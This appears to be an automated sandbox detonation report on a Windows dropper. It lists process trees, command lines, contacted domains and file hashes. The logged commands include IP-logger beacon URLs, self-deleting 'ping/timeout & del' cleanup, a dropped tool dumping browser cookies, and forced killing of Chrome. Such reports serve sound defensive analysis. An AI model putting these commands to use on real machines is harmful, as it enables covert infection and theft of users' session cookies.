PID 2040 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2040 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
PID 2040 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
PID 2040 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
PID 2040 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
PID 1392 wrote to memory of 664 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 604 wrote to memory of 1904 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1392 wrote to memory of 664 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 604 wrote to memory of 1904 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1708 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe
PID 1820 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1204 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
PID 308 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1656 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe
PID 1156 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2040 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

Processes

C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe

"C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1qzLu7

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/14Ahe7

C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:604 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1392 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 3

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"

C:\Windows\SysWOW64\PING.EXE

ping 1.1.1.1 -n 1 -w 3000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe" >> NUL

C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp" /SL5="$40284,680561,121344,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe"

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 sfsdfpizdatrtu.space udp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 www.rationalowl.com udp
KR 211.239.150.87:443 www.rationalowl.com tcp
US 8.8.8.8:53 ffdownload.online udp
US 8.8.8.8:53 www.ipcode.pw udp
DE 51.195.46.236:80 www.ipcode.pw tcp
US 8.8.8.8:53 www.nicekkk.pw udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.facebook.com udp
NL 31.13.64.35:443 www.facebook.com tcp
US 8.8.8.8:53 www.dwedfe.pw udp
US 64.225.91.73:80 www.dwedfe.pw tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 j8hghe3uyf.2ihsfa.com udp
US 99.83.154.118:80 j8hghe3uyf.2ihsfa.com tcp

Files

memory/2040-55-0x0000000075AC1000-0x0000000075AC3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat

MD5 c25faf98d787b358c72543e7e11917c8
SHA1 911d1eb09ba90b071795842089d57d741f959ee3
SHA256 86d72c90e984ebbaf8917bc49c16a68752f8e1e73e59f61eb004eb0b92e1ad40
SHA512 b7e97564dcccc813cda0d6632fb5229a231b2606c2a3b01addb0b2889e7b20c433760b95b7f8273ff2fa423a848fde7aa8ef13b52605e93520b7475815cc2720

\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

MD5 9d7fb45d27ca947c3de8dfc20a4bfe65
SHA1 1669a4eb54494813218d1753b8faa1c6bc88dc0a
SHA256 ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5
SHA512 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

MD5 9d7fb45d27ca947c3de8dfc20a4bfe65
SHA1 1669a4eb54494813218d1753b8faa1c6bc88dc0a
SHA256 ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5
SHA512 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

memory/1708-64-0x0000000002C10000-0x0000000002C4B000-memory.dmp

memory/1708-66-0x0000000000220000-0x0000000000255000-memory.dmp

memory/1708-67-0x0000000000400000-0x00000000027C7000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D9281271-8756-11EC-A514-46595837F587}.dat

MD5 bc5a168c3f12e297f450f2808d691d16
SHA1 7e30d4d9077576bc1094b3f091b4f7548c193e9f
SHA256 9fba3f8d65f9f75c6a79e96cd43afa0e19fefab641524c3584d0d867031a5632
SHA512 35a6e12e94229f136c1931bf2bf8b77b2ff5cdae2a966f7c9bcb0c95b5eb8c639c94dac833cc9f6e4e7fae042a8b2ca45982cc831de6d3c36c8ddedad07479d0

\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe

MD5 010ebf726b3cc67e92eb91d7afbfbd59
SHA1 02db1d5bf39903099612ddb12d4b8918657f0ec0
SHA256 a7e98ba4e9b3149d35cbf64b09bc727b5136ec8375a366ca42d66d1c4fc9e25c
SHA512 84c00731b0724a09d82410c5b0fe40d910c62076ae9fa10a385d084d4dffad5b194b38fd92d48b5fa1991b2fd6e8a370d5f4c43e7f09b424c65c41356ff48f29

C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe

MD5 010ebf726b3cc67e92eb91d7afbfbd59
SHA1 02db1d5bf39903099612ddb12d4b8918657f0ec0
SHA256 a7e98ba4e9b3149d35cbf64b09bc727b5136ec8375a366ca42d66d1c4fc9e25c
SHA512 84c00731b0724a09d82410c5b0fe40d910c62076ae9fa10a385d084d4dffad5b194b38fd92d48b5fa1991b2fd6e8a370d5f4c43e7f09b424c65c41356ff48f29

\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe

MD5 7f6e60001d89e148fabb62ae3b5301ed
SHA1 02679bae2da92b2fc28e5e5e7905fcdeb3382202
SHA256 708a840263c9db1015413c9f186cc52f965d15d26337ecc5c7110b44db955939
SHA512 1bc54d09b1b413676b4e952a80602791e06f64622b7eb81eb50de005c86d9c5c3c49e45bc09cf077ebb94a69db5f8b129c2cac286a96ab3091ffa38b103d4e90

C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe

MD5 7f6e60001d89e148fabb62ae3b5301ed
SHA1 02679bae2da92b2fc28e5e5e7905fcdeb3382202
SHA256 708a840263c9db1015413c9f186cc52f965d15d26337ecc5c7110b44db955939
SHA512 1bc54d09b1b413676b4e952a80602791e06f64622b7eb81eb50de005c86d9c5c3c49e45bc09cf077ebb94a69db5f8b129c2cac286a96ab3091ffa38b103d4e90

memory/1656-80-0x0000000000170000-0x000000000017D000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe

MD5 ddd8a43c5cd1d648af5bfbd67c718261
SHA1 37c915768cb12f54b60eac36cd4c008d7b3340b6
SHA256 159d88ddd564a79129ae91354087369b36d27cad9bde5cc66ac50becae5e7786
SHA512 08268136b5d1245ae4e828205ae4d6efec6845b4ed1507f44520a94f5746837781baddee3910f4b0b0c102b49e4ceceefd8cace686ca8dfed6605af4cf967efb

C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe

MD5 ddd8a43c5cd1d648af5bfbd67c718261
SHA1 37c915768cb12f54b60eac36cd4c008d7b3340b6
SHA256 159d88ddd564a79129ae91354087369b36d27cad9bde5cc66ac50becae5e7786
SHA512 08268136b5d1245ae4e828205ae4d6efec6845b4ed1507f44520a94f5746837781baddee3910f4b0b0c102b49e4ceceefd8cace686ca8dfed6605af4cf967efb

memory/1812-92-0x00000000021C0000-0x00000000022A3000-memory.dmp

memory/1812-93-0x0000000002070000-0x0000000002170000-memory.dmp

memory/1812-94-0x00000000021C0000-0x00000000022A3000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 28d2b5233db11fb15d47576c7fce937c
SHA1 1cba316afc3c76d84f95a0f6e1d5bb61dd0356a3
SHA256 99e44262f35aeaca90c303485b5f01aa42cdeab6909f011dd61f28ca9586aeca
SHA512 7185216e98475cf748de9c136270f27a13dde3aee2f26df27b116d76fff8aecce31dbd6fdfd8ee3a0c71fd77f013f54d3da8799bd597e2b9b302e1603e8356fe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

MD5 28d2b5233db11fb15d47576c7fce937c
SHA1 1cba316afc3c76d84f95a0f6e1d5bb61dd0356a3
SHA256 99e44262f35aeaca90c303485b5f01aa42cdeab6909f011dd61f28ca9586aeca
SHA512 7185216e98475cf748de9c136270f27a13dde3aee2f26df27b116d76fff8aecce31dbd6fdfd8ee3a0c71fd77f013f54d3da8799bd597e2b9b302e1603e8356fe

memory/1624-103-0x0000000000400000-0x0000000000425000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp

MD5 f897ff6640b2528ae0e3211e9240e79f
SHA1 dc6e47b975423894cb812552bb4aa00c6a57b214
SHA256 24f28a4003cdbd3c50eea654213bb12ae94edcfab5e35fad23e72637b2e86640
SHA512 14ccbac9f018268c19a116d9c4478201d6a5a9a086dce3e5d2e3dac9353c015ccaf624ac7f999ddb41fc59b9c7601d096723eb7129d5859d1147b7540a2b6851

C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp

MD5 f897ff6640b2528ae0e3211e9240e79f
SHA1 dc6e47b975423894cb812552bb4aa00c6a57b214
SHA256 24f28a4003cdbd3c50eea654213bb12ae94edcfab5e35fad23e72637b2e86640
SHA512 14ccbac9f018268c19a116d9c4478201d6a5a9a086dce3e5d2e3dac9353c015ccaf624ac7f999ddb41fc59b9c7601d096723eb7129d5859d1147b7540a2b6851

memory/1656-108-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/1656-109-0x0000000070E51000-0x0000000070E53000-memory.dmp

\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe

MD5 7f9a498cc692f9f3f0cfe241c80e8ad8
SHA1 b5c3f7322da2c8b8ce0f473a26b54d057593162e
SHA256 953367b0ce6b0ebf5dda2477828e5a7750b072700d9c96c29136f152d0c3f489
SHA512 8fa1b099c07e5aa352a6c5d0288ffd1ce0c5208fda361bb0129c03fbc16d3a84d12fa6067d143e82795343d9c3c847e35ec6b6638373329467d9025933766db6

C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe

MD5 7f9a498cc692f9f3f0cfe241c80e8ad8
SHA1 b5c3f7322da2c8b8ce0f473a26b54d057593162e
SHA256 953367b0ce6b0ebf5dda2477828e5a7750b072700d9c96c29136f152d0c3f489
SHA512 8fa1b099c07e5aa352a6c5d0288ffd1ce0c5208fda361bb0129c03fbc16d3a84d12fa6067d143e82795343d9c3c847e35ec6b6638373329467d9025933766db6

\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe

MD5 7de995f043de78c13ac79349852bf124
SHA1 23b37d08012bfaa8743359eba29ec8891e23897f
SHA256 9ed80faeb92fd61026b7bf3eb0e080c87cc49c630e77c387acecd4d5c0d34f98
SHA512 7ed1fb7a6be43233a805c5e1593491c8cf29f1dfd43d5f4147ae1c3835639dd62e859d8c0bbe7bf7afc8e697c3b1808e04c16f2ec0c509ac74da8a3f7c566300

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe

MD5 7de995f043de78c13ac79349852bf124
SHA1 23b37d08012bfaa8743359eba29ec8891e23897f
SHA256 9ed80faeb92fd61026b7bf3eb0e080c87cc49c630e77c387acecd4d5c0d34f98
SHA512 7ed1fb7a6be43233a805c5e1593491c8cf29f1dfd43d5f4147ae1c3835639dd62e859d8c0bbe7bf7afc8e697c3b1808e04c16f2ec0c509ac74da8a3f7c566300

\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

MD5 7fee8223d6e4f82d6cd115a28f0b6d58
SHA1 1b89c25f25253df23426bd9ff6c9208f1202f58b
SHA256 a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59
SHA512 3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt

MD5 b7161c0845a64ff6d7345b67ff97f3b0
SHA1 d223f855da541fe8e4c1d5c50cb26da0a1deb5fc
SHA256 fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66
SHA512 98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b4753d14cf15006efdebd928d17782fe
SHA1 27364202233e704bd93b15839a8820b23ffed8f5
SHA256 356bbfbe1c560cddf0167204f84766d1e8d6cd1889904a4b6989ba7a73898a92
SHA512 73f894568bb53493480218f6264ff453056160c640144c5b64420f0682af1d8d8918552edfb31eee9582682a1b332a652befacc5fabce53e2cb06316f5e488e2

\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

MD5 a6279ec92ff948760ce53bba817d6a77
SHA1 5345505e12f9e4c6d569a226d50e71b5a572dce2
SHA256 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

MD5 a6279ec92ff948760ce53bba817d6a77
SHA1 5345505e12f9e4c6d569a226d50e71b5a572dce2
SHA256 8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181
SHA512 213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a59d9b159e7ad93c024ec57c7e895969
SHA1 003a298d1d450e69cf6cb0d9ba1fa00393872c5c
SHA256 cc89f5dba74c57f53fb37f1906b7c0f430379331f7cfa20f6491e69490cb13d2
SHA512 8e4643eccb569a352a4e3ed76f393f6f90e47897d627b096f1121f3c604ed6485d101a3359e16edd05208005902711ccc1bc72227ca6aeb480cbbc97abebbfb3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\6DX42UNT.txt

MD5 18d0c71b6f5f4fee3ef9ad423101ef82
SHA1 2cc73d29382730dbe5c9da8224cdefdcad5b28dd
SHA256 5f40872a7e0e4f665d8ee10a64b763c21dcfec6e93d17a1d5446715a68bf6d7d
SHA512 fab833a8bfd6cf192d11649b35464649d6c8218271a2e0a69858015f5f0ba9defd00b461e5466bd4f66e320e66ffc5a963d2f40373d080ee15854da74b25a8a2

Analysis: behavioral2

Detonation Overview

Submitted

2022-02-06 13:12

Reported

2022-02-06 13:15

Platform

win10v2004-en-20220113

Max time kernel

36s

Max time network

89s

Command Line

"C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2696 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Windows\SysWOW64\cmd.exe
PID 4572 wrote to memory of 2300 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4572 wrote to memory of 4068 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3632 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2300 wrote to memory of 3648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2696 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

Processes

C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe

"C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat" "

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1qzLu7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/14Ahe7

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf6eb46f8,0x7ffbf6eb4708,0x7ffbf6eb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf6eb46f8,0x7ffbf6eb4708,0x7ffbf6eb4718

C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe"

Network

Country Destination Domain Proto
NL 88.221.144.170:80 tcp
NL 88.221.144.170:80 tcp
US 8.8.8.8:53 settings-win.data.microsoft.com udp
US 52.167.249.196:443 settings-win.data.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat

MD5 c25faf98d787b358c72543e7e11917c8
SHA1 911d1eb09ba90b071795842089d57d741f959ee3
SHA256 86d72c90e984ebbaf8917bc49c16a68752f8e1e73e59f61eb004eb0b92e1ad40
SHA512 b7e97564dcccc813cda0d6632fb5229a231b2606c2a3b01addb0b2889e7b20c433760b95b7f8273ff2fa423a848fde7aa8ef13b52605e93520b7475815cc2720

C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

MD5 9d7fb45d27ca947c3de8dfc20a4bfe65
SHA1 1669a4eb54494813218d1753b8faa1c6bc88dc0a
SHA256 ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5
SHA512 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 78afdcc28744f3ccc897189551e60a14
SHA1 6408c2447363d821dc659254a324456ed16207ec
SHA256 ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7
SHA512 8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078